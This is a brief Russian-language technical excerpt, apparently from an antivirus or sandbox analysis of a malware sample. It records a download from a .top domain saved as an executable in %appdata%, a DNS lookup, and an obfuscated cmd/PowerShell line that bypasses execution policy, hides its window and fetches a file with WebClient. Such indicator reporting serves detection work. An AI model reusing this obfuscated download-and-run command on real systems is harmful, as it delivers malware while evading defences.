Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^WE^rSh^E^ll.E^X^E^ -eX^e^cUt^ioNP^OLic^y bY^P^aSS^ -^noPR^o^FIL^e^ -^WINDOWS^t^YlE HIDdEn (nEW^-oBJE^c^t^ SY^sTeM.net^.w^E^b^CL^IenT^)^.DOWNloadf^I^le^('http://smoeroota.t...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "Po^WE^rSh^E^ll.E^X^E^ -eX^e^cUt^ioNP^OLic^y bY^P^aSS^ -^noPR^o^FIL^e^ -^WINDOWS^t^YlE HIDdEn (nEW^-oBJE^c^t^ SY^sTeM.net^.w^E^b^CL^IenT^)^.DOWNloadf^I^le^('http://smoeroota.t...' (со скрытым окном)